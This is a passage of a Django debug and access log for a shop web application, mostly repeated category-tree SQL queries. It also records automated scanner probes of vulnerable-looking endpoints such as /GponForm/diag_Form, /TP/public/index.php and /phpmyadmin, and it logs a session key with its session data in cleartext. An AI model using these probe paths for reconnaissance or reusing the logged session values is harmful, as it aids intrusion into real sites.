"shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-16 14:09:52,133 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-16 14:09:52,141 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-16 14:09:52,146 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-16 14:09:52,150 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-16 14:09:52,154 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-16 14:09:52,158 utils 20136 140506422044416 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-16 14:09:52,162 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-16 14:09:52,167 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-16 14:09:52,171 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-16 14:09:52,174 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-16 14:09:52,179 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-16 14:09:52,183 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [16/Dec/2019 14:09:52] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-16 14:09:52,326 utils 20136 140506422044416 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 10; args=(10,) DEBUG 2019-12-16 14:09:52,335 utils 20136 140506422044416 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) [16/Dec/2019 14:09:52] "GET /api/v1/categories/10 HTTP/1.0" 200 353 [16/Dec/2019 14:09:52] "GET /media/categories/2019/12/13/collection10.png HTTP/1.0" 200 387799 [16/Dec/2019 14:09:53] "GET /media/categories/2019/12/07/collection2.png HTTP/1.0" 200 466113 [16/Dec/2019 14:09:53] "GET /media/categories/2019/12/07/collection3.png HTTP/1.0" 200 784410 [16/Dec/2019 14:09:53] "GET /media/categories/2019/12/07/collection7.png HTTP/1.0" 200 379075 [16/Dec/2019 14:09:53] "GET /media/categories/2019/12/07/collection4.png HTTP/1.0" 200 432480 [16/Dec/2019 14:09:53] "GET /media/categories/2019/12/07/collection8.png HTTP/1.0" 200 376652 [16/Dec/2019 14:09:55] "GET /media/categories/2019/12/07/collection5.png HTTP/1.0" 200 454674 [16/Dec/2019 14:09:55] "GET /media/categories/2019/12/07/collection1.png HTTP/1.0" 200 793553 [16/Dec/2019 14:09:55] "GET /media/categories/2019/12/07/collection9.png HTTP/1.0" 200 284188 [16/Dec/2019 14:13:18] "GET / HTTP/1.0" 302 0 Not Found: /000000000000.cfg [16/Dec/2019 14:17:48] "GET /000000000000.cfg HTTP/1.0" 404 6641 Not Found: /polycom/000000000000.cfg [16/Dec/2019 14:17:49] "GET /polycom/000000000000.cfg HTTP/1.0" 404 6665 [16/Dec/2019 14:18:20] "GET / HTTP/1.0" 302 0 [16/Dec/2019 14:23:23] "GET / HTTP/1.0" 302 0 [16/Dec/2019 14:28:26] "GET / HTTP/1.0" 302 0 [16/Dec/2019 14:33:29] "GET / HTTP/1.0" 302 0 [16/Dec/2019 14:39:26] "GET / HTTP/1.0" 302 0 Not Found: /GponForm/diag_Form [16/Dec/2019 14:39:40] "POST /GponForm/diag_Form?images/ HTTP/1.0" 404 6653 [16/Dec/2019 14:45:37] "GET / HTTP/1.0" 302 0 [16/Dec/2019 14:50:40] "GET / HTTP/1.0" 302 0 [16/Dec/2019 14:55:43] "GET / HTTP/1.0" 302 0 Not Found: /TP/public/index.php [16/Dec/2019 15:00:13] "GET /TP/public/index.php HTTP/1.0" 404 6650 [16/Dec/2019 15:03:05] "GET / HTTP/1.0" 302 0 Not Found: /proxy.php [16/Dec/2019 15:07:03] "GET /proxy.php HTTP/1.0" 404 6625 [16/Dec/2019 15:10:04] "GET / HTTP/1.0" 302 0 [16/Dec/2019 15:15:06] "GET / HTTP/1.0" 302 0 [16/Dec/2019 15:20:09] "GET / HTTP/1.0" 302 0 [16/Dec/2019 15:25:12] "GET / HTTP/1.0" 302 0 [16/Dec/2019 15:30:15] "GET / HTTP/1.0" 302 0 [16/Dec/2019 15:35:18] "GET / HTTP/1.0" 302 0 [16/Dec/2019 15:40:21] "GET / HTTP/1.0" 302 0 [16/Dec/2019 15:45:23] "GET / HTTP/1.0" 302 0 [16/Dec/2019 15:50:01] "GET /whm-server-status HTTP/1.0" 301 0 [16/Dec/2019 15:50:26] "GET / HTTP/1.0" 302 0 [16/Dec/2019 15:59:34] "GET / HTTP/1.0" 302 0 [16/Dec/2019 16:05:03] "GET / HTTP/1.0" 302 0 [16/Dec/2019 16:10:06] "GET / HTTP/1.0" 302 0 [16/Dec/2019 16:15:08] "GET / HTTP/1.0" 302 0 [16/Dec/2019 16:20:11] "GET / HTTP/1.0" 302 0 [16/Dec/2019 16:25:14] "GET / HTTP/1.0" 302 0 [16/Dec/2019 16:30:36] "GET / HTTP/1.0" 302 0 [16/Dec/2019 16:38:20] "GET / HTTP/1.0" 302 0 [16/Dec/2019 16:39:19] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-16 16:39:20,029 utils 20136 140506667599616 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '6oznr1hsg5p6sh81hg1urm8asgwl6alg' LIMIT 1; args=('6oznr1hsg5p6sh81hg1urm8asgwl6alg',) DEBUG 2019-12-16 16:39:20,032 utils 20136 140506667599616 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('6oznr1hsg5p6sh81hg1urm8asgwl6alg', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-30T16:39:20.030118+00:00'::timestamptz); args=('6oznr1hsg5p6sh81hg1urm8asgwl6alg', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 30, 16, 39, 20, 30118, tzinfo=)) [16/Dec/2019 16:39:20] "GET /login/?next=/ HTTP/1.0" 200 1786 [16/Dec/2019 16:41:04] "GET / HTTP/1.0" 302 0 Not Found: /robots.txt [16/Dec/2019 16:41:07] "GET /robots.txt HTTP/1.0" 404 6624 Not Found: /User/User_Favorite.asp [16/Dec/2019 16:41:16] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=134 HTTP/1.0" 404 6705 Not Found: /newslist.asp [16/Dec/2019 16:41:27] "GET /newslist.asp?type=4&id=1306 HTTP/1.0" 404 6649 [16/Dec/2019 16:43:35] "GET / HTTP/1.0" 302 0 [16/Dec/2019 16:45:01] "GET /whm-server-status HTTP/1.0" 301 0 [16/Dec/2019 16:48:37] "GET / HTTP/1.0" 302 0 [16/Dec/2019 16:53:40] "GET / HTTP/1.0" 302 0 [16/Dec/2019 16:58:43] "GET / HTTP/1.0" 302 0 [16/Dec/2019 17:04:29] "GET / HTTP/1.0" 302 0 [16/Dec/2019 17:05:22] "GET / HTTP/1.0" 302 0 Not Found: /proxy.php [16/Dec/2019 17:06:23] "GET /proxy.php HTTP/1.0" 404 6627 [16/Dec/2019 17:09:59] "GET / HTTP/1.0" 302 0 [16/Dec/2019 17:11:41] "GET / HTTP/1.0" 302 0 [16/Dec/2019 17:15:02] "GET / HTTP/1.0" 302 0 [16/Dec/2019 17:20:52] "GET / HTTP/1.0" 302 0 [16/Dec/2019 17:25:54] "GET / HTTP/1.0" 302 0 [16/Dec/2019 17:30:57] "GET / HTTP/1.0" 302 0 [16/Dec/2019 17:36:00] "GET / HTTP/1.0" 302 0 [16/Dec/2019 17:41:02] "GET / HTTP/1.0" 302 0 [16/Dec/2019 17:46:05] "GET / HTTP/1.0" 302 0 [16/Dec/2019 17:47:00] "GET / HTTP/1.0" 302 0 [16/Dec/2019 17:51:08] "GET / HTTP/1.0" 302 0 [16/Dec/2019 17:56:29] "GET /phpmyadmin HTTP/1.0" 301 0 DEBUG 2019-12-16 17:56:30,500 utils 20136 140506667599616 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'phpmyadmin'; args=('phpmyadmin',) Not Found: /phpmyadmin/ [16/Dec/2019 17:56:30] "GET /phpmyadmin/ HTTP/1.0" 404 1736 [16/Dec/2019 17:57:05] "GET / HTTP/1.0" 302 0 [16/Dec/2019 18:05:02] "GET / HTTP/1.0" 302 0 [16/Dec/2019 18:10:05] "GET / HTTP/1.0" 302 0 [16/Dec/2019 18:15:08] "GET / HTTP/1.0" 302 0 [16/Dec/2019 18:23:06] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-16 18:24:05,150 utils 20136 140506667599616 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-16 18:24:05,158 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-16 18:24:05,163 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-16 18:24:05,167 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-16 18:24:05,171 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-16 18:24:05,174 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-16 18:24:05,178 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-16 18:24:05,180 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-16 18:24:05,183 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-16 18:24:05,187 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-16 18:24:05,189 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-16 18:24:05,192 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-16 18:24:05,194 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-16 18:24:05,197 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-16 18:24:05,201 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-16 18:24:05,203 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-16 18:24:05,205 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-16 18:24:05,208 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-16 18:24:05,211 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-16 18:24:05,215 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-16 18:24:05,217 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-16 18:24:05,220 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-16 18:24:05,223 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-16 18:24:05,225 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-16 18:24:05,228 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-16 18:24:05,232 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-16 18:24:05,236 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-16 18:24:05,240 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-16 18:24:05,244 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-16 18:24:05,247 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-16 18:24:05,251 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-16 18:24:05,254 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-16 18:24:05,256 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-16 18:24:05,259 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-16 18:24:05,262 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-16 18:24:05,266 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-16 18:24:05,269 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", 